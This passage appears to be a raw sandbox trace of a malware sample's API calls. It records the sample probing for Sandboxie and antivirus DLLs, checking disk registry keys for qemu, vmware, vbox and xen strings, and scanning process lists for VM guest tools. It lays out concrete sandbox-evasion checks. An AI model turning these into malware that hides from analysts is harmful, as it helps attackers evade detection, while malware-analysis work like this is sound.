"c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe")) returned 0x45 [0079.298] wcsstr (_Str="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe", _SubStr="7869.vmt") returned 0x0 [0079.298] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0079.298] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0079.299] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0079.299] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0079.299] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0079.299] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414860 [0079.299] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0079.299] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0079.299] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0079.299] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.300] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414970 [0079.300] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414970, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414970, ResultLength=0x18ff50) returned 0x0 [0079.300] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.300] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4149a8 [0079.300] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.301] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0079.301] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0079.301] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0079.301] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0079.302] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0079.302] LocalFree (hMem=0x4149a8) returned 0x0 [0079.302] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.302] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4149a8 [0079.302] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.303] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0079.303] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0079.303] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0079.303] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0079.303] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0079.304] LocalFree (hMem=0x4149a8) returned 0x0 [0079.304] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.304] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4149a8 [0079.304] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.305] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0079.305] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0079.305] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0079.305] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0079.305] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0079.306] LocalFree (hMem=0x4149a8) returned 0x0 [0079.306] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.306] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4149a8 [0079.306] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.307] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0079.307] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0079.307] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0079.307] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0079.307] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0079.307] LocalFree (hMem=0x4149a8) returned 0x0 [0079.307] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.307] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x4149a8 [0079.308] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.309] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0079.309] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0079.309] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0079.309] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0079.309] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0079.309] LocalFree (hMem=0x4149a8) returned 0x0 [0079.309] LocalFree (hMem=0x414970) returned 0x0 [0079.309] NtClose (Handle=0x80) returned 0x0 [0079.310] LocalFree (hMem=0x414860) returned 0x0 [0079.310] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414860 [0079.310] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0079.310] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0079.310] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0079.310] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.310] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414970 [0079.310] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414970, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414970, ResultLength=0x18ff50) returned 0x0 [0079.310] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0079.310] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4149a8 [0079.310] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4149a8, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x4149a8, ResultLength=0x18ff50) returned 0x0 [0079.310] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0079.310] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0079.310] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0079.310] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0079.310] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0079.311] LocalFree (hMem=0x4149a8) returned 0x0 [0079.311] LocalFree (hMem=0x414970) returned 0x0 [0079.311] NtClose (Handle=0x80) returned 0x0 [0079.311] LocalFree (hMem=0x414860) returned 0x0 [0079.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x126c8) returned 0xc0000004 [0079.324] LocalAlloc (uFlags=0x40, uBytes=0x136c8) returned 0x414aa8 [0079.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x414aa8, Length=0x136c8, ResultLength=0x18ff5c | out: SystemInformation=0x414aa8, ResultLength=0x18ff5c*=0xe648) returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0079.328] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.328] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.329] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.329] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.330] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.330] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.330] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.330] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.330] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.330] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0079.330] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0079.331] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.331] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.331] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.331] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.331] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.332] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.332] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.332] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0079.332] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0079.332] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.333] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.333] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.333] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.333] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.333] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.333] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.333] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.334] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.334] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.334] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.334] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.337] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.337] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.337] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.337] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.337] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.337] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.337] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0079.337] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0079.337] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.337] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.338] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.338] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.338] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.338] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0079.338] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0079.339] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.339] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.339] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.339] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="qga.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="windanr.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vboxservice.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vboxtray.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0079.339] wcsstr (_Str="shoot_decade_effect.exe", _SubStr="prl_tools.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="qemu-ga.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="qga.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", _SubStr="windanr.exe") returned 0x0 [0079.339] wcsstr (_Str="at_effort.exe", 